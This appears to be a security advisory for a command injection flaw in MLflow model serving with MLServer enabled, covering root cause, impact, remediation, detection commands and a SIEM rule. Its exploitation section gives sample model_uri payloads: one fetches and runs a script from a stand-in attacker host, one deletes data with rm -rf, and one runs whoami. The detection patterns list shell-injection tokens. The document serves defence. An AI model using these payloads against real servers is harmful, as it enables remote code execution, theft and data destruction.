Executive Summary
A critical command injection vulnerability (CVE-2026-0596) has been identified in mlflow/mlflow, the widely deployed open-source machine learning lifecycle management platform. The flaw carries a CVSS score of 9.6 and is triggered when serving ML models using the enable_mlserver=True configuration flag.
The root cause is straightforward: the model_uri parameter is interpolated directly into a bash -c shell command without any sanitisation. An attacker who can influence the value of model_uri — for example, through a model registry, API call, or configuration input — can inject arbitrary shell metacharacters such as $() or backticks to achieve remote code execution on the host serving the model.
Any organisation running MLflow model serving with MLServer integration should treat this as an urgent patch priority, particularly in shared infrastructure, multi-tenant model serving environments, or pipelines that accept externally supplied model URIs.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-0596 |
| CVSS Score | 9.6 (Critical) |
| CWE | CWE-78 — Improper Neutralisation of Special Elements used in an OS Command |
| Type | Command Injection / Remote Code Execution |
| Attack Vector | Network |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Changed |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| Trigger Condition | enable_mlserver=True at serve time |
Affected Versions
| Component | Affected Condition | Fixed Version |
|---|---|---|
| mlflow/mlflow | All versions — when serve() called with enable_mlserver=True | Pending / apply workaround |
Technical Analysis
Root Cause
When MLflow is used to serve a model with the MLServer backend (enable_mlserver=True), the serving function constructs a shell command of the form:
bash -c "mlflow models serve -m <model_uri> --enable-mlserver ..."The model_uri value is embedded directly into this command string without any escaping, quoting, or allowlist validation. This is a textbook CWE-78 (OS Command Injection) pattern.
Exploitation
An attacker who controls or influences the model_uri value can inject shell metacharacters:
# Backtick injection
model_uri = "models:/mymodel/1`curl attacker.com/payload | bash`"
# Command substitution injection
model_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"
# Semicolon-based chaining
model_uri = "models:/mymodel/1; rm -rf /critical/data"Each of these patterns causes the injected command to execute in the context of the MLflow serving process — which in many deployments runs with service account or even root privileges.
Attack Surface
The attack surface is broader than it may initially appear:
- Model Registry API: If an attacker can register a model with a malicious URI, serving any version of it will trigger execution
- Automated pipelines: MLflow pipelines that auto-serve the latest registered model version are directly vulnerable
- Multi-tenant environments: Platforms where multiple teams can register models are especially at risk
- CI/CD integration: Pipelines that call
mlflow models servewith dynamic URIs derived from external input
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary commands execute as the MLflow serving process user |
| Data Exfiltration | Access to training data, model artefacts, secrets, and environment variables |
| Lateral Movement | Shell access can be used to pivot to databases, cloud metadata endpoints, and internal services |
| Persistence | Attacker can install backdoors, cron jobs, or modified model files |
| Supply Chain Risk | Compromised model serving infrastructure can poison downstream predictions or data pipelines |
| Secrets Theft | Cloud provider credentials, MLflow tracking server tokens, and database URIs commonly present as environment variables |
Immediate Remediation
Step 1: Disable MLServer Integration Until Patched
# Do NOT use enable_mlserver=True until a patch is confirmed
mlflow models serve -m "models:/MyModel/1"
# Remove --enable-mlserver flag entirelyStep 2: Validate and Sanitise model_uri Inputs
If you must accept dynamic model_uri values, implement strict allowlist validation:
import re
SAFE_MODEL_URI_PATTERN = re.compile(r'^(models:/[a-zA-Z0-9_\-]+/[0-9]+|runs:/[a-f0-9]{32}/[a-zA-Z0-9_/\-]+|s3://[a-zA-Z0-9._\-/]+)$')
def validate_model_uri(uri: str) -> str:
if not SAFE_MODEL_URI_PATTERN.match(uri):
raise ValueError(f"Unsafe model_uri rejected: {uri}")
return uriStep 3: Use subprocess with Argument Lists Instead of Shell
If you are customising MLflow or contributing a fix, the correct pattern is:
import subprocess
# INSECURE — DO NOT USE
subprocess.run(f"bash -c 'mlflow models serve -m {model_uri}'", shell=True)
# SECURE — argument list bypasses shell interpretation
subprocess.run(
["mlflow", "models", "serve", "-m", model_uri, "--enable-mlserver"],
shell=False
)Step 4: Run MLflow Serving with Minimal Privileges
# Create a dedicated service account
useradd -r -s /sbin/nologin mlflow-serve
# Run serving as that account
sudo -u mlflow-serve mlflow models serve -m "models:/MyModel/1"
# Or in Docker: drop all capabilities
docker run --cap-drop ALL --security-opt no-new-privileges mlflow-serving-imageDetection
Check for Active Exploitation Indicators
# Look for unexpected processes spawned by the mlflow serving process
ps auxf | grep mlflow
# Check for suspicious command execution in audit logs
ausearch -c bash --start today
# Review MLflow server access logs for unusual model_uri values
grep -E '\$\(|`|;.*bash|&&.*curl' /var/log/mlflow/serve.log
# Check for unexpected outbound connections from the serving host
ss -tlnp | grep <mlflow-port>
netstat -anlp | grep ESTABLISHED | grep <mlflow-pid>SIEM Detection Rule (Pseudocode)
rule: mlflow_command_injection_attempt
conditions:
- process.name == "mlflow"
- process.args contains any of ["$(", "`", "; bash", "&& curl", "| sh"]
- event.type == "process_start"
severity: critical
response: alert + isolateWorkarounds
Until an official patch is released:
- Disable MLServer integration — do not pass
enable_mlserver=Trueto any serving call - Restrict model_uri sources — only serve models whose URIs are constructed internally, never from user input
- Network-segment the serving host — block egress from the MLflow serving process to limit the blast radius of exploitation
- Enable audit logging — capture all shell executions on the serving host
- Run in a container with restricted capabilities — limit what an injected command can do